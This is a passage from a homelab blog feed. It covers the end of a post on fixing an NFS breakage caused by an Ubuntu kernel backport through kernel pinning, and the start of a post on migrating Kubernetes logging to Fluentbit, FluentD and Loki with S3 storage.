</span></span><span style="display:flex;"><span>-rwxr-xr-x <span style="color:#ae81ff">1</span> root   root       <span style="color:#ae81ff">53004</span> Feb <span style="color:#ae81ff">16</span> 22:47 bcm2711-rpi-cm4.dtb
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">4624</span> Feb <span style="color:#ae81ff">16</span> 22:47 boot.scr
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root       <span style="color:#ae81ff">52476</span> Feb <span style="color:#ae81ff">16</span> 22:47 bootcode.bin
</span></span><span style="display:flex;"><span>-rwxr-xr-x <span style="color:#ae81ff">1</span> root   root         <span style="color:#ae81ff">285</span> Nov <span style="color:#ae81ff">26</span> 15:57 cmdline.txt
</span></span><span style="display:flex;"><span>-rwxr-xr-x <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">1220</span> Jan <span style="color:#ae81ff">21</span>  <span style="color:#ae81ff">2023</span> config.txt
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">7265</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">5400</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup4.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">3170</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup4cd.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">8382</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup4db.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">8386</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup4x.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root        <span style="color:#ae81ff">3170</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup_cd.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root       <span style="color:#ae81ff">10229</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup_db.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root       <span style="color:#ae81ff">10227</span> Feb <span style="color:#ae81ff">16</span> 22:47 fixup_x.dat
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root    <span style="color:#ae81ff">59735369</span> Feb <span style="color:#ae81ff">17</span> 01:01 initrd.img
</span></span><span style="display:flex;"><span>drwxr-xr-x <span style="color:#ae81ff">2</span> root   root      <span style="color:#ae81ff">738870</span> Feb <span style="color:#ae81ff">16</span> 22:48 overlays
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">2974880</span> Feb <span style="color:#ae81ff">16</span> 22:47 start.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">2250656</span> Feb <span style="color:#ae81ff">16</span> 22:47 start4.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root      <span style="color:#ae81ff">805084</span> Feb <span style="color:#ae81ff">16</span> 22:47 start4cd.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">3746856</span> Feb <span style="color:#ae81ff">16</span> 22:47 start4db.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">2998120</span> Feb <span style="color:#ae81ff">16</span> 22:47 start4x.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root      <span style="color:#ae81ff">805084</span> Feb <span style="color:#ae81ff">16</span> 22:47 start_cd.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">4818728</span> Feb <span style="color:#ae81ff">16</span> 22:47 start_db.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root     <span style="color:#ae81ff">3721800</span> Feb <span style="color:#ae81ff">16</span> 22:47 start_x.elf
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root      <span style="color:#ae81ff">607200</span> Feb <span style="color:#ae81ff">16</span> 22:47 uboot_rpi_4.bin
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root      <span style="color:#ae81ff">592696</span> Feb <span style="color:#ae81ff">16</span> 22:47 uboot_rpi_arm64.bin
</span></span><span style="display:flex;"><span>-rw-r--r-- <span style="color:#ae81ff">1</span> root   root    <span style="color:#ae81ff">10348331</span> Feb <span style="color:#ae81ff">17</span> 01:01 vmlinuz
</span></span></code></pre></div><p>This way, normal OS
updates work seamlessly, as the update copies the new kernel and such to the
NFS share from which dnsmasq supplies those files during netbooting.
The netbooting is controlled from my cluster master host. That&rsquo;s the one host
in my setup without any kind of HA. It&rsquo;s also my one
&ldquo;can&rsquo;t have dependencies&rdquo; host. It&rsquo;s where I run things which everything else
depends on. These are things like my internal DNS server and my netboot setup.
Let&rsquo;s call this host <code>spof</code>, for no reason in particular. This host mounts
the directory with all of the netboot directories for the different hosts. Then,
<a href="https://thekelleys.org.uk/dnsmasq/doc.html">dnsmasq</a> runs a TFTP server for
the other hosts&rsquo; netbooting.</p>
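<p>To give a rough idea of the moving parts, the relevant bits on <code>spof</code> boil down
to an NFS mount plus dnsmasq&rsquo;s TFTP options, something like the sketch below. The
server name and paths here are placeholders, not my actual values:</p>
<pre tabindex="0"><code># /etc/fstab on spof (server name is a placeholder)
nfs.example:/netboot  /mnt/netboot  nfs4  defaults,_netdev  0  0

# dnsmasq snippet serving the mounted files via TFTP
enable-tftp
tftp-root=/mnt/netboot
</code></pre>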
<p>That should be enough for here; if you&rsquo;re interested in an in-depth description
of the setup, have a look at the <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">series of posts</a>
I wrote about it.</p>
<p>Anyway, last night I ran my regular update of all my Homelab hosts. At first,
I thought everything was well. But then, the first two freshly updated hosts
failed to reboot. After some investigation, I saw that on the <code>spof</code> host, the
netboot directory was no longer mounted. Trying to mount it manually, I was
greeted with this error:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mount /mnt/netboot/
</span></span><span style="display:flex;"><span>mount.nfs: Protocol not supported
</span></span></code></pre></div><p>Uh - huh? Going with <code>-v</code> wasn&rsquo;t any more enlightening:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mount -v /mnt/netboot/
</span></span><span style="display:flex;"><span>mount.nfs: timeout set <span style="color:#66d9ef">for</span> Sat Feb <span style="color:#ae81ff">17</span> 12:16:44 <span style="color:#ae81ff">2024</span>
</span></span><span style="display:flex;"><span>mount.nfs: trying text-based options <span style="color:#e6db74">&#39;timeo=900,vers=4.2,addr=10.86.5.132,clientaddr=10.86.1.200&#39;</span>
</span></span><span style="display:flex;"><span>mount.nfs: mount<span style="color:#f92672">(</span>2<span style="color:#f92672">)</span>: Protocol not supported
</span></span><span style="display:flex;"><span>mount.nfs: trying text-based options <span style="color:#e6db74">&#39;timeo=900,vers=4,minorversion=1,addr=10.86.5.132,clientaddr=10.86.1.200&#39;</span>
</span></span><span style="display:flex;"><span>mount.nfs: mount<span style="color:#f92672">(</span>2<span style="color:#f92672">)</span>: Protocol not supported
</span></span><span style="display:flex;"><span>mount.nfs: trying text-based options <span style="color:#e6db74">&#39;timeo=900,vers=4,addr=10.86.5.132,clientaddr=10.86.1.200&#39;</span>
</span></span><span style="display:flex;"><span>mount.nfs: mount<span style="color:#f92672">(</span>2<span style="color:#f92672">)</span>: Protocol not supported
</span></span><span style="display:flex;"><span>mount.nfs: trying text-based options <span style="color:#e6db74">&#39;timeo=900,addr=10.86.5.132&#39;</span>
</span></span><span style="display:flex;"><span>mount.nfs: prog 100003, trying vers<span style="color:#f92672">=</span>3, prot<span style="color:#f92672">=</span><span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>mount.nfs: trying 10.86.5.132 prog <span style="color:#ae81ff">100003</span> vers <span style="color:#ae81ff">3</span> prot TCP port <span style="color:#ae81ff">2049</span>
</span></span><span style="display:flex;"><span>mount.nfs: portmap query retrying: RPC: Program/version mismatch
</span></span><span style="display:flex;"><span>mount.nfs: prog 100003, trying vers<span style="color:#f92672">=</span>3, prot<span style="color:#f92672">=</span><span style="color:#ae81ff">17</span>
</span></span><span style="display:flex;"><span>mount.nfs: trying 10.86.5.132 prog <span style="color:#ae81ff">100003</span> vers <span style="color:#ae81ff">3</span> prot UDP port <span style="color:#ae81ff">2049</span>
</span></span><span style="display:flex;"><span>mount.nfs: portmap query failed: RPC: Program/version mismatch
</span></span><span style="display:flex;"><span>mount.nfs: Protocol not supported
</span></span></code></pre></div><p>So - either my Ceph NFS server or the client code suddenly forgot how NFS works.
Interestingly, this problem was only visible for the NFS mount from my Ceph NFS
server. Another NFS mount, which is supplied by the <code>spof</code> host itself for quick
and easy file transfers in the Homelab, worked without issue. I also found
that the netboot NFS mount still worked on the hosts which had not yet been
updated.</p>
<p>Some googling later, I hit <a href="https://github.com/nfs-ganesha/nfs-ganesha/issues/1025">this bug</a>
against NFS Ganesha, which is the NFS implementation used by Ceph. That then
pointed me to <a href="https://github.com/gregkh/linux/commit/431a5010bce29809e68111c83e31bfd06d15a7d3">this fix in the kernel</a>
for an issue with NFS in relatively recent kernels. It looks like Ubuntu mistakenly
backported the broken NFS commit, but not the fix for it, to their <code>5.15</code> kernels
in Ubuntu 22.04. I saw the issue in the following kernels:</p>
<ul>
<li><code>linux-image-5.15.0-1046-raspi</code> on my Raspberry Pis</li>
<li><code>linux-image-5.15.0-94-generic</code> on my x86_64 hosts</li>
</ul>
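<p>Checking whether a given host is running one of those kernels is quick, either
locally or across the fleet with an ad-hoc Ansible command:</p>
<pre tabindex="0"><code># show the currently running kernel on one host
uname -r
# or for all hosts at once
ansible all -a "uname -r"
</code></pre>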
<p><a href="https://github.com/longhorn/longhorn/issues/6887">This bug report on Longhorn</a>
also serves as an indication that it was a bad backport. It was opened back in
October, when the original bad commit entered the kernel, and then got another
flurry of responses when the LTS Ubuntu kernel got updated.</p>
<p>In the end, I did not have any other choice but to skip the kernel update on
my machines. I pinned the kernel packages by running these commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;x86hosts_group&#34;</span> -a <span style="color:#e6db74">&#34;apt-mark hold linux-image-generic linux-headers-generic linux-generic&#34;</span>
</span></span><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;raspihosts_group&#34;</span> -a <span style="color:#e6db74">&#34;apt-mark hold linux-image-raspi linux-modules-extra-raspi&#34;</span>
</span></span></code></pre></div><p>After that, I could safely run <code>apt upgrade</code> on my hosts. For the two hosts
that I had already updated I needed to go a bit further. The first issue was that
I needed to get the <code>spof</code> host to be able to mount the netboot NFS volume again.</p>
<p>And I went about it in the most stupid way possible. Remember, that host is called
<code>spof</code> for no particular reason. It&rsquo;s central to my Homelab&rsquo;s functioning. And
I decided to use it as a testbed. So, smart guy that I am, I thought: Okay, the
kernel that&rsquo;s booted is in <code>/boot/firmware/vmlinuz</code>. So let&rsquo;s just copy the old
kernel from <code>/boot</code> there, reboot, and done!</p>
<p>Yeah, no. The <code>flash-kernel</code> tool is there for a reason. It does <em>something</em>
when copying the kernel/initrd from <code>/boot</code> to <code>/boot/firmware</code> on Pi hosts.
So now I had an unbootable <code>spof</code> host. I had to remove it from the rack mount,
including its SSD so I could connect a screen and see what the actual problem
was. The error message was that it couldn&rsquo;t find the disk, for reasons I don&rsquo;t
understand. I ended up just copying the kernel and initrd from a different Pi&rsquo;s
<code>/boot/firmware</code> to <code>spof</code>&rsquo;s <code>/boot/firmware</code> and got my host (and DNS&hellip;) back.</p>
<p>The <code>flash-kernel</code> tool then had to be invoked on all the already updated Pis
to switch them back to the older kernel and initrd:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>flash-kernel --force 5.15.0-1045-raspi
</span></span></code></pre></div><p>Let&rsquo;s hope that this fills my quota of kernel bugs in the Homelab for the
next 5 years or so. &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 6: Logging with FluentD, Fluentbit and Loki</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-6-logging/</link>
      <pubDate>Tue, 13 Feb 2024 00:20:32 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-6-logging/</guid>
      <description>How I&amp;#39;m getting logs from /var/log/containers to Grafana</description>
      <content:encoded><![CDATA[<p>Wherein I document how I migrated my logging setup from Nomad to k8s.</p>
<p>This is part seven of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<h1 id="setup-overview">Setup overview</h1>
<p>Let&rsquo;s start with an overview of the setup.</p>
<figure>
    <img loading="lazy" src="logging-structure.png"
         alt="A diagram of the different logging stages. The top box shows redis logs, with the following content: &#39;1:M 28 Jan 2024 20:31:08.432 * Background saving terminated with success&#39;. This is a standard redis log line. The next box down shows the CRI-O logs, stored in /var/log/containers. It has the same log line as before, but now prepended with a timestamp, the output stream, &#39;stdout&#39; in this case, and the letter &#39;F&#39;. Next comes the Fluentbit log. This shows the original log line in a variable called &#39;log&#39;. There are additional variables, &#39;namespace_name&#39;, &#39;container_name&#39; and &#39;labels&#39;. Another box with an arrow going to the Fluentbit box indicates that the log was enhanced with the help of data from the kube-apiserver. Next come the Fluentd logs. The original log line, minus the timestamp and &#39;*&#39;, is now in a variable called &#39;msg&#39;, with the timestamp now in a variable called &#39;time&#39;. In addition, a new variable &#39;level&#39; with value &#39;info&#39; as been added. From FluentD, the next station is &#39;Loki&#39;, which stores the data in &#39;S3&#39; and &#39;Grafana&#39;, which takes input from Loki to display the logs."/> <figcaption>
            <p>Overview of my logging pipeline.</p>
        </figcaption>
</figure>

<p>It all starts out with the app&rsquo;s logs. Those are output to stdout in the container.
Then, my container runtime, <a href="https://cri-o.io/">cri-o</a>, takes that and writes
it to files in <code>/var/log/containers/</code> by default. It also prefixes the log line
with the timestamp, the stream it was coming from, and <code>F</code> for full log lines
as well as <code>P</code> for partial log lines. If I understand correctly, that&rsquo;s just the
standard log format Kubernetes and/or the <a href="https://github.com/kubernetes/cri-api/tree/master">CRI spec</a>
expect.</p>
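<p>To make that concrete, a line in one of those files then looks roughly like the
following. This is a reconstructed example based on the Redis line from the diagram
above, so the exact timestamp and its precision will differ:</p>
<pre tabindex="0"><code>2024-01-28T20:31:08.432101334+01:00 stdout F 1:M 28 Jan 2024 20:31:08.432 * Background saving terminated with success
</code></pre>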
<p>To collect all of these logs, I have a <a href="https://fluentbit.io/">Fluentbit</a>
DaemonSet deployed on all nodes. Mostly, this serves as a pretty dumb log shipper,
tailing all files under <code>/var/log/containers</code>. But before sending the logs
onward, I&rsquo;m enriching them with some k8s information, like labels, via the
<a href="https://docs.fluentbit.io/manual/pipeline/filters/kubernetes">Kubernetes filter</a>.</p>
<p>To gather the logs from all containers in the cluster, as well as the logs from
the host&rsquo;s JournalD instance, I&rsquo;m using <a href="https://www.fluentd.org/">FluentD</a>,
where Fluentbit sends the logs via Fluent&rsquo;s own <a href="https://docs.fluentd.org/input/forward">Forward protocol</a>.
Here, the main task is in parsing the log lines themselves, bringing them all
into some kind of coherent format. This includes things like bringing all the
different ways of defining log levels in line, so I end up only with a few
levels.</p>
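<p>On the FluentD side, the receiving end of that is just a forward source. A minimal
sketch, with the port matching the <code>k8sLogs</code> value from the chart values shown
further down:</p>
<pre tabindex="0"><code>&lt;source&gt;
  @type forward
  port 24230
  bind 0.0.0.0
&lt;/source&gt;
</code></pre>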
<p>FluentD then sends those logs to <a href="https://grafana.com/oss/loki/">Loki</a> for
long-term storage. There I then access them either via Grafana&rsquo;s explore
feature when I&rsquo;m actively looking for something, or via the <a href="https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/logs/">Log panel</a>:
<figure>
    <img loading="lazy" src="grafana-log-panel.png"
         alt="A screenshot of a Grafana log panel. At the top are two drop-downs. The first one is labeled &#39;Namespace&#39; and shows the value &#39;redis&#43;external-dns&#39;. The second one is labeled &#39;Container&#39; and has the value &#39;All&#39;. Below is a list of log lines. On the left side of each line is a colored indicator showing the line&#39;s severity. Next comes the timestamp, followed by the log line&#39;s labels. These are either &#39;external-dns&#39;/&#39;external-dns or &#39;redis&#39;/&#39;redis&#39; in this screenshot. After that come the log entries themselves, showing individual log elements with a &#39;key=value&#39; syntax. The actual log line content is not important here, as this screenshot is only intended to illustrate the final state of the logging setup."/> <figcaption>
            <p>Example of what the final stage of the setup will look like.</p>
        </figcaption>
</figure>
</p>
<p>I&rsquo;ve got separate dashboards for syslogs from the cluster hosts and the running
apps.</p>
<p>One question you might ask is: Why not use Fluentbit for host logs as well?
The reason, as weird as it might sound, is unification: Not all of my hosts run
containers, and not all of them ever will. Examples are my OpenWRT WiFi access point
and my OPNsense router. They both speak the <a href="https://de.wikipedia.org/wiki/Syslog">Syslog protocol</a>,
but don&rsquo;t run containers and aren&rsquo;t part of the k8s cluster. The same goes for my
desktop as well as several other hosts in the Homelab. And I&rsquo;ve found it to make
more sense to standardize on <a href="https://www.syslog-ng.com/">syslog-ng</a> and the
syslog protocol than to run Fluentbit everywhere.</p>
<h2 id="differences-to-nomad-setup">Differences to Nomad setup</h2>
<p>A short note on the difference to what I had before, in Nomad. The basic setup
was the same, with the main difference being that my Nomad cluster runs on
Docker, and I&rsquo;ve been using Docker&rsquo;s <a href="https://docs.docker.com/config/containers/logging/fluentd/">FluentD logging driver</a>.
Instead of writing the logs to a file, this driver supports FluentD&rsquo;s Forward
format and can send directly to the Fluentbit instance, without the diversion
via a file on disk.
In the beginning, I had Nomad/Docker configured in such a way that the first
time a log line touched a disk was when it was written to S3 after being
delivered to Loki. But this had the downside that when Loki, FluentD, Fluentbit
or Grafana were down, I didn&rsquo;t have a convenient way to get at my logs. So I
ended up enabling Nomad&rsquo;s log writing anyway.</p>
<p>I didn&rsquo;t follow the same approach for k8s simply because it seemed that k8s
requires the logs on disk anyway, for e.g. <code>kubectl logs</code> access.</p>
<h1 id="loki-setup">Loki setup</h1>
<p>So let&rsquo;s start with the first component. I started at the top of the stack with
<a href="https://grafana.com/oss/loki/">Loki</a> and worked my way down to
Fluentbit, mostly because this way I could first disable the Nomad deployments
of Loki and FluentD, instead of reconfiguring them to also accept logs from k8s
just to then switch them off a couple of days later.</p>
<p>For Loki, I wrote my own Helm chart. Loki <a href="https://grafana.com/docs/loki/latest/setup/install/helm/">does provide Helm charts</a>.
But they have one glaring downside:</p>
<blockquote>
<p>If you set the singleBinary.replicas value to 1, this chart configures Loki to run the all target in a monolithic mode, designed to work with a filesystem storage.</p></blockquote>
<p>See <a href="https://grafana.com/docs/loki/latest/setup/install/helm/install-monolithic/">here</a>.
The Helm chart does not allow using any other form of storage, besides the local
file system, when using a single binary. And I have absolutely no reason to use
the clustered deployment of Loki. But I do want to use S3 for storage, as I find
the &ldquo;just a big lake of data&rdquo; approach of S3 pretty nice, especially for logs.</p>
<p>To begin with, let&rsquo;s look at the values file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">port</span>: <span style="color:#ae81ff">3100</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">lokiPath</span>: <span style="color:#e6db74">&#34;/hl-loki&#34;</span>
</span></span></code></pre></div><p>I&rsquo;ve kept this pretty simple. As it&rsquo;s my own chart, I&rsquo;m only using Helm values
for things which I need to reference in multiple different manifests. So this
only contains the port Loki will listen on, my common <code>homelab/part-of</code> label
and the path where some scratch storage will be mounted as a working directory.</p>
<p>Instead of starting with the deployment and going from there, I will start with
all the manifests used in there this time. Let&rsquo;s see whether that improves the
reading flow.</p>
<p>First, the S3 bucket. This bucket will be used as storage for the logs and
the index. I will create it with Ceph Rook&rsquo;s <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">Object Bucket Claim</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">objectbucket.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ObjectBucketClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">logs</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">generateBucketName</span>: <span style="color:#ae81ff">logs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span></code></pre></div><p>This claim will create a bucket in Ceph&rsquo;s RGW S3 implementation and will
generate a set of credentials to access that bucket, in the form of both a
Secret and a ConfigMap. The bucket&rsquo;s name is partially randomly generated, and
in my case, the bucket is called <code>logs-4138cb40-b96c-4526-b47e-f474a4978775</code>.
The secret will be named after the <code>generateBucketName</code>, so in this case it
will just be called <code>logs</code>. It contains the values <code>AWS_ACCESS_KEY_ID</code> and
<code>AWS_SECRET_ACCESS_KEY</code>. This way, when used via the <code>envFrom</code> functionality
in a Pod spec, it automatically exposes the S3 credentials in the standard environment
variables.</p>
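<p>If you&rsquo;d like to double-check the generated credentials and bucket coordinates
(the ConfigMap is shown next), something like this works, assuming <code>kubectl</code>
access to the namespace the claim lives in:</p>
<pre tabindex="0"><code>kubectl get configmap logs -o jsonpath=&#39;{.data.BUCKET_NAME}&#39;
kubectl get secret logs -o jsonpath=&#39;{.data.AWS_ACCESS_KEY_ID}&#39; | base64 -d
</code></pre>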
<p>The ConfigMap generated by the OBC is also called <code>logs</code>. It contains the necessary
config values to configure an application to access the bucket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_HOST</span>: <span style="color:#ae81ff">rgw-service.ceph-cluster-namespace.svc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_NAME</span>: <span style="color:#ae81ff">logs-4138cb40-b96c-4526-b47e-f474a4978775</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_PORT</span>: <span style="color:#e6db74">&#34;80&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_REGION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">BUCKET_SUBREGION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span></code></pre></div><p>These config values are then exposed as environment variables and referenced
in the Loki configuration file, which I provide via a ConfigMap:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-conf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">loki.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    target: &#34;all&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    auth_enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    server:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      http_listen_port: {{ .Values.port }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      grpc_server_max_recv_msg_size: 8000000
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      log_format: &#34;json&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    common:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      path_prefix: {{ .Values.lokiPath }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      instance_addr: 127.0.0.1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      storage:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        s3:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          s3forcepathstyle: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          bucketnames: ${BUCKET_NAME}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          endpoint: ${BUCKET_HOST}:${BUCKET_PORT}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          access_key_id: &#34;${AWS_ACCESS_KEY_ID}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          secret_access_key: &#34;${AWS_SECRET_ACCESS_KEY}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          insecure: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      ring:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        kvstore:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          store: &#34;inmemory&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    query_range:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      cache_results: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      results_cache:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        cache:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          redis:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            endpoint: redis.redis.svc.cluster.local:6379
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          embedded_cache:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    ingester:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      wal:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      lifecycler:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ring:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          replication_factor: 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          kvstore:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            store: &#34;inmemory&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    storage_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      boltdb_shipper:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        active_index_directory: {{ .Values.lokiPath }}/active_index
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        shared_store: &#34;s3&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        cache_location: {{ .Values.lokiPath }}/shipper_cache
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    chunk_store_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      chunk_cache_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        redis:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          endpoint: redis.redis.svc.cluster.local:6379
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    schema_config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      configs:
